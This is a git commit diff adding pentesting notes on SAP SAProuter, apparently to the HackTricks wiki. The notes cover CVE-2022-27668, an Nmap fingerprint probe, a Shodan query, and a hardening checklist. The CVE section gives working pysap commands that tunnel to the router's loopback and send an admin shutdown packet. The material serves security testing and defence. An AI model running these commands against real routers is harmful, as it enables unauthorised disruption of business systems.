Add content from: Research Update: Enhanced src/network-services-pentesting/32...

This commit is contained in:
HackTricks News Bot 2025-08-09 08:24:52 +00:00
parent f09a9494a9
commit 6a1805a247
2 changed files with 64 additions and 5 deletions

View File

@ -71,15 +71,75 @@ This approach underscores the importance of secure SAProuter configurations and
For more detailed information on Metasploit modules and their usage, visit [Rapid7's database](http://www.rapid7.com/db).
---
## Recent Vulnerabilities (2022-2025)
### CVE-2022-27668 Improper Access Control ➜ Remote Administrative Command Execution
In June 2022 SAP released Security Note **3158375** addressing a critical flaw (CVSS 9.8) in SAProuter (all kernels ≥ 7.22). An unauthenticated attacker can abuse permissive `saprouttab` entries to **send administration packets** (e.g. *shutdown*, *trace-level*, *connection-kill*) from a remote host, even when the router was started without the `-X` remote-admin option.
The issue results from the possibility to build a tunnel to the routers own loopback interface by targeting the unspecified address **0.0.0.0**. Once the tunnel is established, the attacker gains local-host privileges and can run any admin command.
Practical exploitation can be reproduced with the **pysap** framework:
```bash
# 1. Build a loopback tunnel through the vulnerable SAProuter
python router_portfw.py -d <ROUTER_IP> -p 3299 \
-t 0.0.0.0 -r 3299 \
-a 127.0.0.1 -l 3299 -v
# 2. Send an admin packet (here: stop the remote router)
python router_admin.py -s -d 127.0.0.1 -p 3299
```
**Affected versions**
* Stand-alone SAProuter 7.22 / 7.53
* Kernel 7.49, 7.77, 7.81, 7.857.88 (incl. KRNL64NUC/UC)
**Fix / Mitigation**
1. Apply the patch delivered with SAP Note **3158375**.
2. Remove wildcard (`*`) targets from `P` and `S` lines in `saprouttab`.
3. Make sure the router is started **without** the `-X` option and is **not** directly exposed to the Internet.
---
## Updated Tooling & Tricks
* **pysap** actively maintained and provides `router_portfw.py`, `router_admin.py` & `router_trace.py` for crafting custom NI/Router packets, fuzzing ACLs or automating the CVE-2022-27668 exploit.
* **Nmap** extend service detection by adding the custom SAProuter probe:
```text
Probe TCP SAProuter q|\x00\x00\x00\x00|
ports 3299
match saprouter m|SAProuter ([\d.]+)| p/SAProuter/ v/$1/
```
Combine with NSE scripts or `--script=banner` to quickly fingerprint versions that leak the banner string (`SAProuter <ver> on '<host>'`).
* **Metasploit** the auxiliary modules shown above still work through a SOCKS or NI proxy created with pysap, enabling full framework integration even when the router blocks direct access.
---
## Hardening & Detection Checklist
* Filter port **3299/TCP** on the perimeter firewall allow traffic only from trusted SAP support networks.
* Keep SAProuter **fully patched**; verify with `saprouter -v` and compare against the latest kernel patch level.
* Use **strict, host-specific** entries in `saprouttab`; avoid `*` wildcards and deny `P`/`S` rules that target arbitrary hosts or ports.
* Start the service with **`-S <secudir>` + SNC** to enforce encryption and mutual authentication.
* Disable remote administration (`-X`) and, if possible, bind the listener to `127.0.0.1` while using an external reverse proxy for required traffic.
* Monitor the **dev_rout** log for suspicious `ROUTER_ADM` packets or unexpected `NI_ROUTE` requests to `0.0.0.0`.
---
## **References**
- [https://www.rapid7.com/blog/post/2014/01/09/piercing-saprouter-with-metasploit/](https://www.rapid7.com/blog/post/2014/01/09/piercing-saprouter-with-metasploit/)
- [https://sec-consult.com/vulnerability-lab/advisory/improper-access-control-in-sap-saprouter/](https://sec-consult.com/vulnerability-lab/advisory/improper-access-control-in-sap-saprouter/)
## Shodan
- `port:3299 !HTTP Network packet too big`
{{#include ../banners/hacktricks-training.md}}

View File

@ -48,7 +48,7 @@ Yes, you can, but **don't forget to mention the specific link(s)** where the con
> [!TIP]
>
> - **How can I cite a page of HackTricks?**
> - **How can I a page of HackTricks?**
As long as the link **of** the page(s) where you took the information from appears it's enough.\
If you need a bibtex you can use something like:
@ -144,4 +144,3 @@ This license does not grant any trademark or branding rights in relation to the
{{#include ../banners/hacktricks-training.md}}